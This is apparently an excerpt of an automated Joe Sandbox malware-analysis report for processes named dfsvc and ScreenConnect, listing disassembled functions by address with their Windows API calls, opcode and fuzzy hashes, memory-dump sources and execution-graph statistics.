                                                                                                                                                                                                                                                          Function 00007FF887F51212 Relevance: 1.8, APIs: 1, Instructions: 268networkCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 930238652-0
                                                                                                                                                                                                                                                          • Opcode ID: 452c4585aa0152b0db1878ffed89f1ceabd1c1fa7f7dde4c522101f9897c3b9d
                                                                                                                                                                                                                                                          • Instruction ID: 891859a5074ea0cb0bc67d9abb2f42e85aa1ea6b2d118e52c874f148301f99d9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 452c4585aa0152b0db1878ffed89f1ceabd1c1fa7f7dde4c522101f9897c3b9d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4581AE30508A8D8FDB69DF28C8557E93BE1FB5A311F04426FE84DC7692DA74A845CB82
                                                                                                                                                                                                                                                          Function 00007FF887F49A0A Relevance: 1.7, APIs: 1, Instructions: 160fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: 132c43499d444378ec33c57ad8284ba1b413a84490bba7ee461198dcd1d4b477
                                                                                                                                                                                                                                                          • Instruction ID: 58b93dd8f2f0a37a6e76a3f6225ab2999dcdbe4cc00d358f06afbf2e3de419de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 132c43499d444378ec33c57ad8284ba1b413a84490bba7ee461198dcd1d4b477
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541BF71A0CA1C8FDB68EF5CD845BA97BE0FB69310F14416EE04DD3252CB30A941CB81
                                                                                                                                                                                                                                                          Function 00007FF887F499FA Relevance: 1.6, APIs: 1, Instructions: 136fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: 5b93997d179bfb5451da2e5c099564eaeb755fb01be88bf124386f1720de5c89
                                                                                                                                                                                                                                                          • Instruction ID: 856a1fbdacf7375b76daca44ea12a39543d58d43a1cfb63bf9429fc8e1df8af0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b93997d179bfb5451da2e5c099564eaeb755fb01be88bf124386f1720de5c89
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC416D71A1CA5C8FDB98EF58A445BA8BBF0FB59310F1441AED04DD3252CB34A995CB82
                                                                                                                                                                                                                                                          Function 00007FF887E2EEC0 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2496540444.00007FF887E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E2D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887e2d000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 75e5c756b7dcc5aa8ddea97c3d9d96baf520e4efa45d925d1c5805fb5268b1df
                                                                                                                                                                                                                                                          • Instruction ID: d6f53d9001dd8af59c99cf124bd54f0c2d70bdd686a17555928a5f01bc1983a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75e5c756b7dcc5aa8ddea97c3d9d96baf520e4efa45d925d1c5805fb5268b1df
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41F37180DBC44FE7569B2898499663FF0FF53360B1501DFE088CB1A7D629A846C792

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:12.4%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:14
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 14138 7ff887f2f67b 14139 7ff887f2f687 CreateFileW 14138->14139 14141 7ff887f2f7bc 14139->14141 14147 7ff887f3f219 14148 7ff887f3f223 GetTokenInformation 14147->14148 14150 7ff887f3f2d7 14148->14150 14151 7ff887f3f458 14152 7ff887f3f46f CloseHandle 14151->14152 14154 7ff887f3f4eb 14152->14154 14142 7ff887f28414 14144 7ff887f2841d 14142->14144 14143 7ff887f28482 14144->14143 14145 7ff887f284f6 SetProcessMitigationPolicy 14144->14145 14146 7ff887f28552 14145->14146

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FF887F28414 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: 35866e30ad98cd72ddadbc83fd409f6a54a5a1c844d3c206c4464286c7a9b08c
                                                                                                                                                                                                                                                          • Instruction ID: 565b27536a21523d6b568d0c9c065f865eb0c4769a4a51724dbe32b8311ca0c1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35866e30ad98cd72ddadbc83fd409f6a54a5a1c844d3c206c4464286c7a9b08c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6412631D1CB498FDB15AFA8984A6F97BF0FF55361F04017EE049C3192DE68A846CB92
                                                                                                                                                                                                                                                          Function 00007FF887F2F67B Relevance: 1.7, APIs: 1, Instructions: 177fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1176 7ff887f2f67b-7ff887f2f710 1181 7ff887f2f71a-7ff887f2f7ba CreateFileW 1176->1181 1182 7ff887f2f712-7ff887f2f717 1176->1182 1184 7ff887f2f7bc 1181->1184 1185 7ff887f2f7c2-7ff887f2f7f5 1181->1185 1182->1181 1184->1185
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: 2fdc3f3012e853cba07de18fc9a39ea22267458c5edb1ff6227b951ea3db1c61
                                                                                                                                                                                                                                                          • Instruction ID: cfdf385f1d9e784fe27ab10b6b6e42e33ce6dca503962cec106d9c1e1da94e8b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fdc3f3012e853cba07de18fc9a39ea22267458c5edb1ff6227b951ea3db1c61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55518F7191CA5C8FDB58EF58E845BE9BBE0FB59310F1441AEE04DD3252CB34A845CB82
                                                                                                                                                                                                                                                          Function 00007FF887F3F219 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1277 7ff887f3f219-7ff887f3f2d5 GetTokenInformation 1280 7ff887f3f2dd-7ff887f3f30e 1277->1280 1281 7ff887f3f2d7 1277->1281 1281->1280
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                          • Opcode ID: 55c183c3d8d3b6c59ed39369dc80759829f6bb7855c16ab0cc79e51947e516a5
                                                                                                                                                                                                                                                          • Instruction ID: 42ddc7b029a6a99598af3894db4afd9fe19c50dbc384369d44cfa312524ff8d9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55c183c3d8d3b6c59ed39369dc80759829f6bb7855c16ab0cc79e51947e516a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B31B47191CB488FDB18DB58D845AFD7BE0EB9A311F04426EE089D3252DB75A806CB92
                                                                                                                                                                                                                                                          Function 00007FF887F3F458 Relevance: 1.4, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                          • Opcode ID: a530634cb9107e80b91bf08ea091becc0e3cb01cb03ebade527644281d9212be
                                                                                                                                                                                                                                                          • Instruction ID: 085b83cd134e3b42ee5c0c74108e6ad0d48fac3427bf0ce2f916a8e1ac945cbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a530634cb9107e80b91bf08ea091becc0e3cb01cb03ebade527644281d9212be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21BF3190CA5C8FDB58EB98C449BF9BBE0FBA5321F00422FD049D3252DB65A856CB81

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 02EE2260 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq$
                                                                                                                                                                                                                                                          • API String ID: 0-415435924
                                                                                                                                                                                                                                                          • Opcode ID: 2a3dbb5d13f2e73ed8865bdb4b8f7715b7700d91f96283f4521f3c8b49fcad06
                                                                                                                                                                                                                                                          • Instruction ID: 3ac90114f9319b56e76dd926e9a2db0f4ebacda24d298982baeac2d27a92791a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a3dbb5d13f2e73ed8865bdb4b8f7715b7700d91f96283f4521f3c8b49fcad06
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E751BE307402068BCB19EF39D854AAE77F6EF88624B109078D906EB360EF75DC01CBA0
                                                                                                                                                                                                                                                          Function 02EE5658 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s$t*s
                                                                                                                                                                                                                                                          • API String ID: 0-800204968
                                                                                                                                                                                                                                                          • Opcode ID: a7e2c5922f655ad157edf084f868455fa8d7fa8daaeb59aa0404b1f7242ab1d3
                                                                                                                                                                                                                                                          • Instruction ID: 7c99d4d1a038fe298cc015c1fd838604bd0bc5e592901f38d994510d78dd0122
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e2c5922f655ad157edf084f868455fa8d7fa8daaeb59aa0404b1f7242ab1d3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411ADB0B0030AAFDF24CE69C800AEBB7B6BFC4614F58C476E505DB254E7719901CB90
                                                                                                                                                                                                                                                          Function 02EE3480 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                                          • Opcode ID: 2a2fe7ef5e8cdd9623073b366eed357b65e8fa0b75b98936d8bce1e424851a59
                                                                                                                                                                                                                                                          • Instruction ID: 92ae9039805416f8158c0f62a4953edf83b01c578494a10af1f723f5b58936db
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a2fe7ef5e8cdd9623073b366eed357b65e8fa0b75b98936d8bce1e424851a59
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6931D231700712ABDB18AA689C9056F77E6FBC86207418A3DD416E7740EF38ED098BE5
                                                                                                                                                                                                                                                          Function 02EE5648 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s
                                                                                                                                                                                                                                                          • API String ID: 0-1920582113
                                                                                                                                                                                                                                                          • Opcode ID: 173309c3b9ab12a1835ce4bf49aaa47b016aeb532859f3ce8380df67a12826af
                                                                                                                                                                                                                                                          • Instruction ID: 8cbeb5ef27664d5445174cd57b5dbfcaea48f848c94ede5cb0a41d20746a18b7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 173309c3b9ab12a1835ce4bf49aaa47b016aeb532859f3ce8380df67a12826af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14118EB1A40206AFDF20CE68CC01BEAB7B6BF84615F58C466E555AB254E7319901CB90
                                                                                                                                                                                                                                                          Function 02EE6EE8 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                          • API String ID: 0-3372436214
                                                                                                                                                                                                                                                          • Opcode ID: db85bb2cd078db430662fe30fe645e0925c2fac6ba598f291d5ce151fc53111d
                                                                                                                                                                                                                                                          • Instruction ID: 30faa7f86cab7174720e95a5c3837e3242678302b1d0699228f8a3210b005941
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db85bb2cd078db430662fe30fe645e0925c2fac6ba598f291d5ce151fc53111d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F0E5323083505BD7145F6B685C01A7EABFBC9A21704403EF50AC7341DE658C09C392
                                                                                                                                                                                                                                                          Function 02EE7691 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6d978653c6ada99f297f2b6dea5d8c1e69eff651730c6f75f0ce9c455224f675
                                                                                                                                                                                                                                                          • Instruction ID: 73af8f33566aa154235c0ac973f34033375313b6ce20342f20f4c42b2f00866c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d978653c6ada99f297f2b6dea5d8c1e69eff651730c6f75f0ce9c455224f675
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A5192719003099FEB05DFB4E854BD9BBB1EF85320F158169D404BB390EB789949CF65
                                                                                                                                                                                                                                                          Function 02EE5238 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 43b8903af8398117e7a1425dd0b1d2baf468dd3b220df372ca3a4c7afc8d65d4
                                                                                                                                                                                                                                                          • Instruction ID: 0a93d061544fcd406c85a39d7f2d43a7519cef0a04541000d557472508c13435
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43b8903af8398117e7a1425dd0b1d2baf468dd3b220df372ca3a4c7afc8d65d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A610634B106099FDB14DFA8D894AAEB7F2FF8D219B509159E506AB364DB30EC01DB50
                                                                                                                                                                                                                                                          Function 02EE6F42 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9b7e751116a2543afb2fe7bf198da17def5cdf19df85a34750fa820d983377a
                                                                                                                                                                                                                                                          • Instruction ID: 13e66fc19376f4a5fc2353cf1beaf44832b9afd7e1c5b7bf6bcc70b49c0c4385
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9b7e751116a2543afb2fe7bf198da17def5cdf19df85a34750fa820d983377a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D51DD30A002149FDB249BA5D858BAEBBF6FF84714F14D52AE807DB394DB719C44CBA0
                                                                                                                                                                                                                                                          Function 02EE3608 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9ceb12d7b716154f14034062d384233c13d108ab1e8f8abb705444ae382f6e74
                                                                                                                                                                                                                                                          • Instruction ID: f03996cae50cfa49a271fed826c704bd144fc99490e8416141d240a1e2ef6865
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ceb12d7b716154f14034062d384233c13d108ab1e8f8abb705444ae382f6e74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE516CB4600705CFCF24CF39D845AAAB7F2FB84225B149A69E456977A0DB30E846CB90
                                                                                                                                                                                                                                                          Function 02EE4940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f3f5c6fc2b7bd08a69d78ba957d5bf930d081a9c616a6b02b2e6eb998e56585e
                                                                                                                                                                                                                                                          • Instruction ID: 8489ed23a3d6659352e5211cee3cc8d4ed83e30c3a800befeeb188c2beb5dc37
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3f5c6fc2b7bd08a69d78ba957d5bf930d081a9c616a6b02b2e6eb998e56585e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6951FA34600701CFCB24CF65D894A56B7F2FF8D628B149A5CD49B9B7A4EB31E805CB54
                                                                                                                                                                                                                                                          Function 02EE7770 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a0377e7df2b9eeb007a5652b2daa580fe5dae0ca2cda82e9ee6f3d763a6b882d
                                                                                                                                                                                                                                                          • Instruction ID: ca551f90863a357e814ad6aae2d297f44b4194fcb8c8770ddb29669fe94443ed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0377e7df2b9eeb007a5652b2daa580fe5dae0ca2cda82e9ee6f3d763a6b882d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B516970A003099BDB01DFB4E854BDDBBB2FF89310F108569E505BB290EB78A945CF64
                                                                                                                                                                                                                                                          Function 02EE42F0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f239a6535545f6db572c8cf3a5278cc7d27fc8bfbc7086e7c2be18708f3cadbe
                                                                                                                                                                                                                                                          • Instruction ID: 6a45c70c8eb1df45ad528b820b0cb8355fe0ebb3759719737e8955885a08635c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f239a6535545f6db572c8cf3a5278cc7d27fc8bfbc7086e7c2be18708f3cadbe
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16419030B00605CBDF15EF64E8946AEBBB6FF84324B14C569D9069B285DF74EC06CBA1
                                                                                                                                                                                                                                                          Function 02EE6208 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 256d81432e1bdec2941edce39637556bd1fa4f9e1900bc7d0234509dc241249f
                                                                                                                                                                                                                                                          • Instruction ID: d5f18a0b5fea7fded1c09608c3e8de96b66bef1491b0433d2e73c4961c9c719f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 256d81432e1bdec2941edce39637556bd1fa4f9e1900bc7d0234509dc241249f
